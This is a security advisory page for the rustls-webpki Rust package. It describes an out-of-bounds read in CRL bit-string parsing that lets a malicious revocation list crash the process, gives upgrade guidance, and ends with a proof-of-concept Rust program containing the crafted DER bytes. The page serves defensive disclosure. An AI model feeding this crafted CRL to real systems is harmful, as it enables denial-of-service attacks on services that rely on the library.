Out-of-bounds Read Affecting rustls-webpki package, versions <0.103.13>=0.104.0-alpha.1 <0.104.0-alpha.7
Threat Intelligence
Exploit Maturity
Snyk has a proof-of-concept or detailed explanation of how to exploit this vulnerability.
Proof of Concept
Do your applications use this vulnerable package?
In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.
Test your applications- Snyk IDSNYK-RUST-RUSTLSWEBPKI-16300213
- published27 Apr 2026
- disclosed24 Apr 2026
- creditty3
Introduced: 24 Apr 2026
New CVE NOT AVAILABLE CWE-125 (opens in a new tab)Common Weakness Enumeration (CWE) is a category system for software weaknesses
How to fix?
Upgrade rustls-webpki to version 0.103.13, 0.104.0-alpha.7 or higher.
Overview
Affected versions of this package are vulnerable to Out-of-bounds Read in the bit_string_flags() function in der.rs. An attacker can cause a panic and terminate the process with a malicious Certificate Revocation List (CRL) containing the bit string [0x00]. This is only exploitable if CRL checking is explicitly enabled (which it is not by default) by setting RevocationOptions to verify_for_usage().
PoC
fn main() {
let crl: &[u8] = &[
0x30, 0x65, 0x30, 0x50, 0x02, 0x01, 0x01, 0x30, 0x0d, 0x06, 0x09,
0x2a, 0x86, 0x48, 0x86, 0xf7, 0x0d, 0x01, 0x01, 0x0b, 0x05, 0x00,
0x30, 0x0c, 0x31, 0x0a, 0x30, 0x08, 0x06, 0x03, 0x55, 0x04, 0x03,
0x13, 0x01, 0x41, 0x17, 0x0d, 0x32, 0x30, 0x30, 0x31, 0x30, 0x31,
0x30, 0x30, 0x30, 0x30, 0x30, 0x30, 0x5a, 0x17, 0x0d, 0x32, 0x31,
0x30, 0x31, 0x30, 0x31, 0x30, 0x30, 0x30, 0x30, 0x30, 0x30, 0x5a,
0xa0, 0x10, 0x30, 0x0e, 0x30, 0x0c, 0x06, 0x03, 0x55, 0x1d, 0x1c,
0x04, 0x05, 0x30, 0x03, 0x83, 0x01, 0x00, 0x30, 0x0d, 0x06, 0x09,
0x2a, 0x86, 0x48, 0x86, 0xf7, 0x0d, 0x01, 0x01, 0x0b, 0x05, 0x00,
0x03, 0x02, 0x00, 0x00,
];
// Panics — never returns
let _ = webpki::BorrowedCertRevocationList::from_der(crl);
}